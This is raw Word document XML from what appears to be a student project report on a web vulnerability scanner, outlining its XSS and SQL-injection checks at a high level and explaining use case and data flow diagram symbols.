          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Setup and Initialization:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Setting up a web driver for browser automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>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Loading payloads from the provided text files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scanning Process:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Navigating to the target URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Injecting payloads into form fields and URL parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Detecting potential vulnerabilities based on the response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fault Detection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>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For XSS: Detecting unexpected alerts as an indication of successful payload execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="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For SQLi: Checking for common SQL error messages in the response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc25413"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>UCD (Use Case Diagram)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="63"/>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jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5062220" cy="3665855"/>
            <wp:effectExtent l="0" t="0" r="12700" b="6985"/>
            <wp:docPr id="36" name="Picture 36" descr="Screenshot 2024-05-31 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05-31 194928"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect l="15016" t="11633" r="21398"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5062220" cy="3665855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc43339155"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc27671"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>DFD (Data Flow Diagram)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pP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 xml:space="preserve">Larry Constantine first developed the DFD as a way of expressing system requirements in a graphical from, this lead to the modular design.  </w:t>
      </w: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pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc14313"/>
      <w:bookmarkStart w:id="67" w:name="_Toc43339156"/>
      <w:bookmarkStart w:id="68" w:name="_Toc1776"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>DFD Symbols</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>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In the DFD, there are four symbols</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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square defines a source(originator) or destination of system data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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An arrow identifies data flow.  It is the pipeline through which the information flows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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circle or a bubble represents a process that transforms incoming data flow into outgoing data flows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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An open rectangle is a data store, data at rest or a temporary repository of data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>342900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>93345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1372235" cy="1028700"/>
                <wp:effectExtent l="0" t="0" r="18415" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="31" name="Group 31"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1372235" cy="1028700"/>
                          <a:chOff x="1980" y="10260"/>
                          <a:chExt cx="2161" cy="1620"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="32" name="AutoShape 5"/>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33" name="Line 6"/>
                        <wps:cNvCnPr/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1980" y="10620"/>
                            <a:ext cx="2160"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27pt;margin-top:7.35pt;height:81pt;width:108.05pt;z-index:251661312;mso-width-relative:page;mso-height-relative:page;" coordorigin="1980,10260" coordsize="2161,1620" o:gfxdata="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kFcb52QAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQ&#10;SwECFAAUAAAACACHTuJApKSyjtoCAABgBwAADgAAAAAAAAABACAAAAAoAQAAZHJzL2Uyb0RvYy54&#10;bWxQSwUGAAAAAAYABgBZAQAAdAYAAAAA&#10;">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:roundrect id="AutoShape 5" o:spid="_x0000_s1026" o:spt="2" style="position:absolute;left:1980;top:10260;height:1620;width:2161;" fillcolor="#FFFFFF" filled="t" stroked="t" coordsize="21600,21600" arcsize="0.166666666666667" o:gfxdata="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IQum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line id="Line 6" o:spid="_x0000_s1026" o:spt="20" style="position:absolute;left:1980;top:10620;height:0;width:2160;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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bEr+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p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="2160" w:firstLine="72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Process that transforms data flow.</w:t>
      </w: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p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>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239395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1005840" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="22860" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="30" name="Text Box 30"/>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ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>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6pt;margin-top:18.85pt;height:36pt;width:79.2pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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vEdxtgAAAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsB&#10;AhQAFAAAAAgAh07iQB6h+9UuAgAAiAQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1s&#10;UEsFBgAAAAAGAAYAWQEAAMcFAAAAAA==&#10;">
                <v:fill on="t" focussize="0,0"/>
                <v:stroke color="#000000" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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Source or Destination of data</w:t>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ab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>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90805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1028700" cy="0"/>
                <wp:effectExtent l="0" t="76200" r="19050" b="95250"/>
                <wp:wrapNone/>
                <wp:docPr id="29" name="Straight Connector 29"/>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6pt;margin-top:7.15pt;height:0pt;width:81pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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xIc941wAAAAgBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAA&#10;CACHTuJAafh4ne8BAADdAwAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAA&#10;AAYABgBZAQAAhwUAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke color="#000000" joinstyle="round" endarrow="block"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Data flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>467995</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>156845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1010920" cy="555625"/>
                <wp:effectExtent l="0" t="0" r="17780" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="24" name="Group 24"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1010920" cy="555625"/>
                          <a:chOff x="2177" y="9125"/>
                          <a:chExt cx="1592" cy="875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="25" name="Line 8"/>
                        <wps:cNvCnPr/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2185" y="9125"/>
                            <a:ext cx="1584" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="line">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="26" name="Line 9"/>
                        <wps:cNvCnPr/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2185" y="10000"/>
                            <a:ext cx="1584" cy="0"/>
                          </a:xfrm>
                          <a:prstGeom prst="line">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:solidFill>
